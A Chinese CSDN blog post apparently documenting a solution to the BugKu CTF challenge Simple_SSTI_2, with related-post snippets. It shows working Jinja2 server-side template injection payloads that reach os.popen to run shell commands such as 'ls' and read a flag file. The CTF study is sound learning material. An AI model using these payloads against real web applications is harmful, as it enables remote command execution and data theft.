BugKu练习记录11:Simple_SSTI_2

于 2024-05-09 16:01:08 发布
阅读量177 收藏
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44396970/article/details/138617525
版权

题目:
在这里插入图片描述
题目提示为ssti,先判断使用的模板;注入${77},未返回49,继续注入{{77}},返回49,再注入{{7*‘7’}},返回7777777,判断为jinja2模板。

通过config调用os尝试

?flag={{config.__class__.__init__.__globals__['os'].popen('ls ..').read()}}

在这里插入图片描述
逐个查看目录
在这里插入图片描述

发现存在flag文件,打开后得到答案。
在这里插入图片描述

十七vvvvvv
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Bugku web Simple_SSTI_2 wp
Whaocai的博客
08-05 609
考点: ①SSTI注入 最近学了学python ssti注入,找一道题练习练习。 进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。 结合题目,直接payload:?flag={{1+1}},用的是flask模板 jinja2引擎 常见的ssti构造payload思路是: 这道题比较简单,什么敏感关键词都没有过滤 ...
BugKu练习记录1:Simple_SSTI_1
qq_44396970的博客
04-22 111
进入http://114.67.175.224:12392/?flag={{config.SECRET_KEY}}可以发现有一个参数名为flag,可能存在变量secret_key,考虑通过注入命令的方式尝试取得密码。(在flask中,经常会设置变量secret_key。
Simple_SSTI_1-WEB-bugku-解题步骤
weoptions的博客
12-02 1116
——CTF解题专栏——分享我的解题过程
BugKu web题练习
2401_82760239的博客
03-27 775
lipsum:Flask框架中的一个方法,可用于获取__builtins__,且lipsum.__globals__包含os模块(例如:{{lipsum.__globals__['os'].popen('ls').read()}})。还可以使用{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}来执行操作系统命令。__globals__:通过函数名.__globals__获取函数所在命名空间中可用的模块、方法和所有变量。
BugKu_WEB_(1)
young的博客
07-21 856
BugKu平台练习wp
bugku中的web题
m0_62619269的博客
05-20 706
Simple_SSTI_1 先来简单看一下什么是SSTI模板注入 {{ … }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% … %}:装载一个控制语句。 {# … #}:装载一个注释,模板渲染的时候会忽视这中间的值 很简单的模板注入,查看页面源代码 很明显,flag在secret_key下。最下面说在flas k里,我们经常建立一个SECRET_KEY,上方模板注入,直接访问URL+?flag={undefined{ config .SECRET_KEY}}得到f
CTF_WEB(习题)
若比邻的博客
12-15 5076
一、bugku_web_cookie欺骗:https://ctf.bugku.com/challenges/detail/id/87.html 地址栏filename一看为base64,解密为keys.php 尝试index.php加密为base64:aW5kZXgucGhw,读取一下,啥也没有 观察地址栏,将line赋值为1试试,发现是将index.php按行读取了 将index.php读取出来,读读取结果 #cookies欺骗 import requests php=""
ctf之WEB练习
渗透测试研究中心
12-15 3082
题目名称:Simple_SSTI_2题目wirteup:启动题目场景,获得靶场网站,访问网站,页面显示url连接需要连接一个 flag参数http://114.67.246.176:19131/根据题目内容,该题是一个ssti漏洞,这里构造ssti,参数构造flag={{3+2}},报错,且是flaskhttp://114.67.246.176:19131/?flag={{3+2}}又尝试构造f...
入门安全测试?从渗透测试开始做起....
08-16 1120
emo的时候想不想删库跑路?想不想把homepage的logo改成本人头像?想不想把工资条上的数后面加上很多0? 别别别,千万不要拿自家公司做实验,还是来靶场玩一玩渗透测试吧!打开你的脑洞,干点“坏”事,不犯法也可以满足你的各种奇怪的愿望哦~...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
flaskssti:测试SSTI
02-21
标题中的“flaskssti”指的是一个与Python web框架Flask相关的项目,可能是一个扩展或教程,专注于“SSTI”(Server-Side Template Injection,服务器端模板注入)。SSTI是一种安全漏洞,允许攻击者通过操纵模板引擎...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
Gf-Patterns:GF模式(ssrf,RCE,Lfi,sqli,ssti,idor,URL重定向,debug_logic,有趣的Subs)参数grep
03-19
Gf模式V 1.9 By grep的包装器,可帮助您grep处理问题安装如果您已经安装并配置了Go,则可以使用以下命令安装waybackurls & Gf : :play_button: go get -u github.com/tomnomnom/waybackurls:play_button: go get -u...
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8338
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
GDAL-2.4.1-cp36-cp36m-win_amd64.whl
最新发布
07-17
GDAL-2.4.1-cp36-cp36m-win_amd64.whl
注射用七叶皂苷钠说明书.doc
07-17
说明书
docker配置资料.txt
07-17
docker安装
bugku simple_ssti_1
03-16
simple_ssti_1 是一道来自 Bugku 的简单 Server-Side Template Injection(SSTI)漏洞题目。 SSTI 漏洞通常发生在使用模板引擎时,攻击者可以利用这种漏洞执行任意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值